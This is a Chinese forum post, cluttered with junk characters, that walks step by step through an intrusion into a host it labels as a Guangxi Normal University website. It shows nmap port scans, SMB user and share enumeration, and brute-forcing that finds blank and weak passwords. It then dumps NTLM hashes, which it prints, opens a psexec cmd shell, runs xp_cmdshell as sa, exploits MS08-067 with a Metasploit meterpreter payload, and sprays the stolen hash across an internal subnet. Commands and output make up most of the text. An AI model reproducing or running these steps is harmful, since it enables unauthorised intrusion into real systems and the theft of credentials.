广西师范网站http://202.103.242.241/
4 ]" n4 J" @3 f& [' M# t% ~+ B% K: c& {( p; Y l" M% ]9 z
root@bt:~# nmap -sS -sV 202.103.242.241
K" i$ @4 ~5 f' K g g
0 L0 c' e8 u. N' Y1 i/ u" u( b$ QStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
- p- m% E1 A( t0 J! Z7 D, ?' y2 X$ n. M8 ?5 p
Nmap scan report for bogon (202.103.242.241)3 H, b- F& g( \+ P$ o1 D
+ O# w& B( h( cHost is up (0.00048s latency).
; D- U0 z% o; D4 L ] k2 P; b3 f' }( g$ j
Not shown: 993 closed ports
, N( r7 ]0 } M, `& _; q
" X* K+ `8 {4 R V. h4 }PORT STATE SERVICE VERSION% y/ P5 O; \3 x
( b. S4 z* n7 a4 v* R
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) X3 y6 q- H) D7 Q) K
' w5 g" q+ n \
139/tcp open netbios-ssn
# J! e1 e# N. q3 e* o) C p" u! B
& d$ M8 E& ]! P" P7 j9 a& b445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds, n; t( g" F( L
1 A# h- C" B4 j0 x2 N! ]
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
1 r! Q% q! n1 |; I+ }! K3 K& l/ z* t# l* l% h7 p2 y! K
1026/tcp open msrpc Microsoft Windows RPC" Q& w5 G! P1 ~6 O4 Q% L( m# U" i
/ R# l% h" X# B& W0 l& z* \3372/tcp open msdtc?
( Q. k/ m/ m" L* Z4 _. w
7 z# A1 J2 |' g' P. r- [3389/tcp open ms-term-serv?( n( p4 [+ `+ k) C* x% H* z5 J& r
; L& h) y: n( G* e+ Z# V! x1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
) D8 Y, r/ Q5 n! [6 u' o- x' aSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
0 G5 w. W$ Y* j. B2 v3 `! ~& L* t) k ~" ~/ S
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions7 j0 g, j. S9 M2 R! m. \1 O
1 w/ h+ |+ J! W) R5 e x
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
1 m/ q7 T% J6 r1 S) y# J9 X7 d! ^% M3 A% X. m
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
/ i$ {; [4 \+ b( m! I$ |0 Y9 K+ ~! ~& {0 U
SF:ptions,6,”hO\n\x000Z”);5 s; T. ?! q% o. t, K- b
0 n3 `: Q! Z. l. y- D0 N6 y9 z
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
% C- D7 Z. P/ ?6 i7 [3 ^7 s, G5 ^5 B) \1 \7 A( R Y
Service Info: OS: Windows, r* V+ t" B9 {$ B) F5 r. g" }
( K! I" j5 m; _9 I, F" Z4 t, t2 u1 o
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .6 A; p0 p/ x! ~- V
9 K2 R4 r4 R. C& c/ C0 j) GNmap done: 1 IP address (1 host up) scanned in 79.12 seconds3 I8 F3 g# C$ w% y3 s5 d
7 M5 s5 A: u6 y& ]9 d
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
9 F# |0 U- W1 v. `0 u9 P1 L0 b# K3 v9 D6 g1 K O: J
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
s% B8 S6 r8 Y* b0 `4 [% l5 I0 U+ {& N" E
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
% X: k* u: `* M2 o" S; V" u2 Q( S' r% ]$ Z# o3 B1 i
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
. G6 y9 O; D- O% W6 m- f' ]4 q1 R! L$ f0 @) r/ {
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
4 M: L3 q+ D& T Y3 {
; z# K8 s( a& `' @-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
' }/ ^: n% J& [" R8 ] g' Q1 B& |" w
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse4 [6 W" [8 d: F! t3 |& `
# Y- S; A6 |1 ?
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse- i# g. C0 c/ Y; Z
8 G% ?5 m" _# ~
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse, y4 i8 J) i q1 S# e5 A
& V9 n/ B" c* F, b8 [-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
& q1 s: ?, G$ z1 j$ x
4 z4 b$ |2 ?( s/ `4 o-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse# y r" n$ j# Y k. l( p
, s4 z3 v0 y% A ^* y0 J6 ?
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
$ T3 v; \9 y& H j; j3 C5 s9 k6 O* q+ x w7 J4 a; x
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
" A8 ~* S7 K( K+ U. c1 J7 W/ h S' L/ y3 w% x/ t8 }5 Y1 u3 H1 B% e
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse( U" X8 M+ f+ W- ?
4 _$ X4 b5 d, J2 _8 B-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse, b5 s6 k) c- a* Z# ?* n' ^
. o8 v0 Y4 w- t ^-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
0 X( z' i0 Y8 G" s- j2 Y
' C* q+ C/ v3 X+ _: vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 2 Z$ O# H. t2 d9 h) a' Y
5 M* R8 Z6 L5 m" J' G) p//此乃使用脚本扫描远程机器所存在的账户名: ?* }; ]5 H0 ?% w4 [+ q
! ^ u* p5 j0 tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
5 x! M+ d/ o) m% T6 p. y- n- q8 l3 Y3 e& T
Nmap scan report for bogon (202.103.242.241)" P5 O' }, V# ?- {) V$ w
% k1 R, @1 t2 j; U) OHost is up (0.00038s latency).
' G- d2 f1 f% G# A. S8 w
+ g9 h$ x& b# U& s, f5 x0 {Not shown: 993 closed ports
$ G/ B% _( [+ J3 @9 p" @& F1 W d6 G( k
PORT STATE SERVICE
a4 _4 E0 U2 |/ s9 y/ i7 C5 n3 N! ~3 _7 n; i. u
135/tcp open msrpc- B. t. P. z+ `( v& S* l$ ^
0 A( T1 w! C7 r% [0 l% Q( A; F) i139/tcp open netbios-ssn
D! Z- I( N3 u: f; L$ `9 a, B$ S& y) U
445/tcp open microsoft-ds
% J: T5 q: } C8 D& [4 r' F/ G+ c3 y0 M ~( w
1025/tcp open NFS-or-IIS
# L. X7 ^" R) g# `; C( V. p$ t. M9 T9 Q1 |0 n1 W9 G. @9 s ^
1026/tcp open LSA-or-nterm
' t& B$ L$ X% K& v7 X& f$ D2 t$ F8 f b, M# K, L2 l6 z! z" x
3372/tcp open msdtc7 a9 S7 H5 [6 }, M! |2 E; Q/ A
: `8 b O7 V) `3 r4 F2 U3389/tcp open ms-term-serv
- c' x$ E$ |; [
2 A6 q( g1 e6 FMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); z0 {& A! P' X: C0 Y$ q
; A0 j; ~2 m" u. VHost script results:( A3 e2 B: t4 B+ o/ T. r
$ U+ c$ r1 y# C8 H- D- l, A: g1 U1 U$ j| smb-enum-users:9 E9 [; k0 D7 d6 Z7 }
$ i* ?! O- i: R! }. B8 Q% t
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果 k1 J+ q# }" n' L% V2 T+ a; Z
9 d1 N$ n- G1 O: Z% u
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
' F" |5 r1 ]& O: P6 E4 I3 _. h1 P; t. K$ m. \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
% e4 {4 Y: g% f! ^2 @! N( N5 O
, M0 _, b$ m- o F7 W//查看共享
6 Z' t/ R& {9 }$ P+ h& }! n H& {* t; s# `0 Y9 Q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST' G% t6 U. h( H0 I7 W2 V
+ B6 j; L# ^4 ^- ONmap scan report for bogon (202.103.242.241)) |9 h2 n* Z. \ q
( [# l4 e: K B8 @; Z6 ^
Host is up (0.00035s latency).
# P i, _& b. `& W1 X9 i* {* e+ n9 k3 d
Not shown: 993 closed ports2 f7 n3 `, s# D4 C
M% v b, P$ t" \PORT STATE SERVICE
; r- K/ {& r3 H/ e% ~2 P' W# l5 y- S- S( P8 K d2 F8 b0 K
135/tcp open msrpc
% B) ^5 o6 E8 J4 C% e( w; K' r' `; ^. p! L. E9 o
139/tcp open netbios-ssn; H" r2 D& t9 m4 \/ T; j$ q
' _ K. {9 G/ E6 x445/tcp open microsoft-ds+ i+ {( H# |& R: G& Y
. C2 d3 J; R, f( ?4 c
1025/tcp open NFS-or-IIS; S R; d/ b* g8 \
6 b. V; {# J# h0 F( E: V$ u5 J6 v1026/tcp open LSA-or-nterm" J7 X1 v; }' |/ d' e" @- E3 P
' k& n, J$ r* {. N% P
3372/tcp open msdtc
; p; Y: d& r9 O
6 o8 B* c2 w* i' G' d. c: r* Z3389/tcp open ms-term-serv7 `( Y, D+ f+ S6 M" S
6 r+ H( n! V# w% N4 O' ^4 f( w: _0 a& R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 m4 T5 F' d! F, r/ W5 K
) N2 s6 z" f$ Q0 ]3 F) q; qHost script results:
3 e. _+ y7 L6 d0 x" J' H4 |/ x) n& s1 Q7 X. ]9 `3 P; ^# M, ~
| smb-enum-shares:
& g8 Y* D \1 I# T% ~- ~. o, _, c1 p; H
| ADMIN$
8 ^+ S( L9 I$ P, T$ k
, a) v c% m7 \% `) z| Anonymous access: <none>: A& [7 G) g- D) x1 z0 F8 x0 O
; R1 @; Q1 f3 ~6 e| C$2 j+ P- k3 S) x# s; i/ k5 t
! _+ N8 R5 Z" E4 Y8 r| Anonymous access: <none>
?4 H6 S5 p% C0 C; g7 H0 s/ t9 i0 q4 K- k/ O+ D' D3 F
| IPC$& @4 T+ J4 D1 i3 k
# a& r. p# o8 {3 \0 w5 p|_ Anonymous access: READ
( ]+ @- @! u7 `' {5 d, C; W m V8 u9 I
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
6 g0 {9 d6 ]; H6 ?2 P' d$ D* @$ e
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
2 Q- ^: V+ d. G0 w, @$ {
( R3 \$ l/ _1 [//获取用户密码
' A" ]) \) Y# L: V2 r4 r) U0 T* P+ V9 M) K, [, Q; J( {
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
5 l/ z/ D7 Z0 h
" _. t8 X$ `9 P; Q: @$ A. b- Q& FNmap scan report for bogon (202.103.242.2418)+ r# s% @5 o# T
) D) [/ c8 v s2 b M) ]$ u& RHost is up (0.00041s latency)., S" ~& V# _; X. U
, d2 ` M2 n- X+ o, ~% U' x* c
Not shown: 993 closed ports% @; a3 A" b8 {
/ k& q9 s1 l8 y$ v, L S2 ?6 t
PORT STATE SERVICE
# A( q: E. _9 F/ s2 P
; A: g9 f9 ^; N6 V/ U( _/ Z135/tcp open msrpc
5 q& U8 m1 n1 x$ m* r) R, b/ x
* r' ^/ K* K( v7 S, _, G7 l139/tcp open netbios-ssn
, y& K0 u. `; U2 k: @8 O1 b
9 ^' |" J6 v. C0 O; E4 V9 r# e5 E, |445/tcp open microsoft-ds3 V1 L% C$ c2 }9 U. y1 a% T& h6 `! T
8 Q( Q' ^; q. o0 a8 q Y1025/tcp open NFS-or-IIS" y" t* z+ `; K* _% c0 E' O# B
- m, o2 z1 `2 \) q" ]% X* C1026/tcp open LSA-or-nterm; j7 [) V! v7 c; j& x0 |& E) |
8 s! N F3 h5 E. Q/ U) s4 a3372/tcp open msdtc
- H' e: ]7 H5 a% T* ^
9 d$ A. B" x b, t7 o+ R/ X3389/tcp open ms-term-serv5 {) v" |6 q, j& q0 a+ K
7 N# l$ H% y2 W4 _
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ ]9 v- z9 w* P4 V. l1 ~+ P' ?1 `) w1 o4 e
Host script results:
1 j! g7 _! A& H5 h- f" e! T
) b b! ~0 r4 j0 F6 p| smb-brute:" v7 X% k, [+ @3 ^* w4 t
0 l6 J' }# P4 G" M* K) J" X- radministrator:<blank> => Login was successful i$ t0 n3 d+ t9 S6 c) Y& ^- l
% G+ S* u; H9 [0 N; ^) a, U
|_ test:123456 => Login was successful; j4 T! O4 L$ K. _7 C D+ G
6 v5 g' J5 w) r/ Y5 m! j/ P& BNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
9 N( f( [ S8 u, v! ^* {# i6 N+ L- {" u4 e
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
2 ]5 h) b6 w( U6 t9 p4 o3 l% b. |/ Q D6 r4 ?3 \" Y
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
3 \* I _6 `5 H5 V' c1 `+ Z3 F% B/ \
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse3 H, K2 D9 ^2 X: _2 k# R
p9 c m7 ?1 y1 proot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139: f0 j# F& ~/ |
6 W' H( U% m# ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
) G! d1 F0 s: C- p) W) q/ ~
5 F2 B, W' x8 k0 N1 G4 Q: a: _! C/ FNmap scan report for bogon (202.103.242.241)6 Q5 V( u0 f+ U$ m0 L
+ x- K( ]: b0 [( T
Host is up (0.0012s latency).& B1 `" i2 J+ z0 r# s
( }% v3 w1 ^1 Y, ~' R, @PORT STATE SERVICE
' K& q( M) F0 v, s y
0 D) g0 X' A7 ^5 ]. \ S; [4 c135/tcp open msrpc# `, c5 [, C' M
9 ? O" X8 u6 m
139/tcp open netbios-ssn. W& C* W8 ~' k/ K
$ B+ t1 q$ i/ j2 j! k% z( m445/tcp open microsoft-ds
9 N1 Q% ?* G! w9 `
5 v p, w( `, Z0 t( XMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- j' ]5 V" h r$ D1 ~* |6 `9 `
* x$ I: o( {+ ?$ x0 k) k/ a
Host script results:
3 D9 K' Y' g0 B# e6 { U9 Y9 Z! Z) j1 [, }2 w8 f
| smb-pwdump:% M% D' U/ F4 w" d
3 u6 b) c: K# O$ x
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
6 m1 g1 p6 K+ ]6 F# [6 C8 ?$ X- C* p! m7 o G; k9 B( R
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************1 s; n. |3 S; @; O* J
1 c$ Y' g6 m4 E- a4 Q7 q| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D44 i- v W/ \& w8 X4 n
2 h3 R9 H' [$ P8 A. s6 P7 _. K
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2- B( C+ |* c3 i* K' I, ^
; E2 Q+ ]; X, k* Y0 R( u% y" a
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
# r, m4 @" s2 [, F5 d9 v. D+ M
0 d4 ?6 ^5 S' B0 }C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
% G3 \% I9 P! x. ?5 B- ~" k/ d. i9 O- l2 ?
-p 123456 -e cmd.exe2 l* z" \( a2 b! ?8 v
" ^4 z+ Y$ @- D
PsExec v1.55 – Execute processes remotely
+ R( W: }& s. m% M+ P* f/ i: p- @9 l( [/ i
Copyright (C) 2001-2004 Mark Russinovich2 F2 N+ y5 O5 S; M) y" T
9 U1 y; T1 U/ m# {8 a
Sysinternals – www.sysinternals.com! o& c x( i0 _" X! R
5 _; z+ l7 i; |! }: N8 B$ \Microsoft Windows 2000 [Version 5.00.2195]
8 @! K+ _1 ]: z6 c! |' T( _
. L8 h8 ?- I8 ~6 t7 X4 e( F+ s(C) 版权所有 1985-2000 Microsoft Corp.- K, h0 N" H9 ]& l: V! ^
8 C7 Q7 L# u! @& m. k* x. r5 Q
C:\WINNT\system32>ipconfig* f1 m! h( y S+ X0 ~' S) _
: L, p8 L' \1 L7 g# g+ A2 M0 w
Windows 2000 IP Configuration
/ N5 O Q( z+ \ i: h- m1 u& t# K4 n! V6 D9 Y/ d* K! O6 n
Ethernet adapter 本地连接:9 Z$ I8 u" p4 u# e* i- Y
& M& S/ r; o% p+ K# s# |
Connection-specific DNS Suffix . :* U1 y9 u9 I, n. v( Y6 B
6 ?6 c R- L" z$ _4 nIP Address. . . . . . . . . . . . : 202.103.242.241, `' x4 y+ R @( N
8 N: H( j, Q- Q9 `' a. Q5 }! |
Subnet Mask . . . . . . . . . . . : 255.255.255.0- [' m' {+ s! `6 g
! `( d* }, P+ L7 x% S& }Default Gateway . . . . . . . . . : 202.103.1.1
* P6 p; e4 h, ]
/ J* K+ Y W j. H2 W1 W/ OC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令" |9 w+ V% L1 D; D8 B
6 y. m" L& Z! Y) P9 C' w$ c4 L: P I4 nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞" k. b/ N9 Q( z0 s3 [- R
1 m f7 }/ x8 l
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
) k# R1 b# \/ I9 `* V" f8 _" `7 o; e0 Z" g
Nmap scan report for bogon (202.103.242.241)+ j* a: _6 v4 M( m1 u2 I& W9 o
# A3 w. L7 p* K2 LHost is up (0.00046s latency).1 f+ N8 L) B- ^
; a% i) b5 ^: h$ a/ FNot shown: 993 closed ports& g+ \: k& C; Z, h
: S9 F# j3 Z7 J" j! ?PORT STATE SERVICE" Z+ l u I$ T' s
5 x c6 y/ v' k9 V135/tcp open msrpc) X* n" M2 }3 h3 ]
' R' }8 C# y! v6 P7 ?139/tcp open netbios-ssn
; I" J2 v$ ?$ X- n
# A* f4 p0 t" B* L6 M& y445/tcp open microsoft-ds
0 c5 Z: H+ S2 _6 Q1 C/ u. [0 y1 r* G0 q* |5 N; N) G- y
1025/tcp open NFS-or-IIS
* i+ T1 G/ _8 q }: a* N0 C* t) e! W. f5 ~+ y V$ J7 ~" o" s, [5 g$ V* d) E7 U
1026/tcp open LSA-or-nterm
4 t9 a I: Y& g. h: _# ?" S# T8 d! f- p4 u8 e
3372/tcp open msdtc6 h+ l8 r. j6 q$ P; r' k
5 Z6 c6 ]. [- x3 K% p3389/tcp open ms-term-serv* B$ @# L5 W+ J# S) O; b
* y/ R. {% ?, `2 u1 Z) u8 dMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- ~, l+ z2 j5 x% X$ Z9 ~
; T; u6 _# u: ?4 Y7 k
Host script results:7 V0 x$ g" v. E+ n' F( m
/ \( g5 e0 c2 b, v4 W4 U| smb-check-vulns:
9 ?) [; K8 J! o9 h5 K2 A9 V/ f0 o4 O; R0 l
|_ MS08-067: VULNERABLE5 E+ ~5 B+ Q/ _
# c8 y* y2 t2 V8 V
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds3 u# S p* M6 r |+ d5 [* Y
1 B/ v. d6 @+ M7 ?) z7 Sroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出; S3 B' J! ? l& g% o/ X
/ W6 U" u- v6 h0 V8 @! P$ c) Y
msf > search ms08
1 A+ E; Z% `7 w( N, q% [' a* K( b& T4 L% s
msf > use exploit/windows/smb/ms08_067_netapi. c8 m- F( ]* K3 X9 J/ N
; W) F( m4 }- f! e; b( Tmsf exploit(ms08_067_netapi) > show options v+ k, ?5 E/ X. h$ j$ s
I1 F, Q6 e6 I! Y6 K; V5 D9 M" ?
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.2416 u2 p+ U6 P* Y6 D
3 M0 b) T3 ~/ k* f
msf exploit(ms08_067_netapi) > show payloads5 N- y; m/ {0 M7 |5 Q& E
2 ^! j* p1 w% q& w; Qmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
0 z; N, O k' V E' f5 ^! u) F7 A7 ]8 p
msf exploit(ms08_067_netapi) > exploit
1 r1 k( c2 N* c% U2 o! A7 x [7 H" K4 ^5 Z/ c/ B- P8 y
meterpreter >
6 R3 Z- e7 z5 Y# ~# L
) T1 Z! w& u s6 Q# M% VBackground session 2? [y/N] (ctrl+z). o9 ?: S$ D& c2 a/ K
! f9 C0 i: ^2 s# W$ X8 u" smsf exploit(ms08_067_netapi) > sessions -l
0 o7 ^' E' r* S
" c& p/ T# E* Jroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
9 E5 M/ V, o4 t" y) o4 b8 M6 g; u; _- a4 h4 D4 N
test( O* w: j% ~. M D9 B( p- V/ B! o6 A
7 J5 L; T L' r% {7 s x* J: madministrator* q# ~" P% l* {3 u# l& Y* T
; `' Z1 N% |' froot@bt:/usr/local/share/nmap/scripts# vim password.txt
. P2 l! A6 k# q( |
) U- K; m+ e1 a. I3 {44EFCE164AB921CAAAD3B435B51404EE! f0 B9 v' ^' k
- d/ C) ]5 j! kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
3 H' m5 s7 t- C6 i% w" w1 T, k; J0 y
//利用用户名跟获取的hash尝试对整段内网进行登录, c+ p* M: C) _/ E
* _5 q; z; ^0 ]6 u* XNmap scan report for 192.168.1.105
$ j. f1 r- [% V( V' ]4 Q+ q8 d; E6 m. X# | P
Host is up (0.00088s latency).
1 w5 t: p/ {" g1 F/ { U/ f5 l4 e7 J" _- V+ U; Y, s+ X0 V3 Y9 Z- P
Not shown: 993 closed ports
: i$ [& J! z/ Y% r7 z) c j/ ]2 m$ N* Q/ a/ |( n( `) u+ @
PORT STATE SERVICE# X: j* F% G/ s' S0 m; E
- I Z3 u+ x9 s135/tcp open msrpc
) ^5 ]! S8 f( m, Z3 F. q7 X% ]
, v0 _: r! M; k5 K6 r \139/tcp open netbios-ssn
. r: a$ r, I& H; _* p" r
2 g" H8 X4 ~) V# }& c% F445/tcp open microsoft-ds
8 i$ N: S2 _- L. Y: j! O b# g. e; v9 D/ E: R3 t% ]
1025/tcp open NFS-or-IIS
o0 W6 e* f# ]2 s
! g( K3 R( z6 ]; O1026/tcp open LSA-or-nterm
7 ^) F7 z$ b( X9 u$ `" @. j3 y$ ]! x# G [2 x
3372/tcp open msdtc
. @' P* m! b7 H8 I+ ]
- j$ s" N( @8 j0 T Q8 u6 N4 Q3389/tcp open ms-term-serv! p% ?1 H# P, E/ P* ~: u; O
7 p2 B- K5 G, J* p4 u! n" h2 ]; ~
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# J+ Y$ G o/ ]: ^0 Q% r
3 ~ X! k* q" R' B6 |0 u9 iHost script results:
( a. S- h3 ^ ]3 V+ S
' f" E0 F# b/ v" ~% s| smb-brute:
7 E. s7 p% e) ~0 [: {2 D$ k: b2 t1 e2 u% V% d
|_ administrator:<blank> => Login was successful5 ?5 X" S+ v. Z5 u
4 ?1 u* s: o/ c, l. F
攻击成功,一个简单的msf+nmap攻击~~·
T4 a; r, B8 e1 O
5 |# A* B2 v4 s1 {( L$ O6 a+ A, H |
发表于 2012-12-4 12:46:42
收藏
支持
反对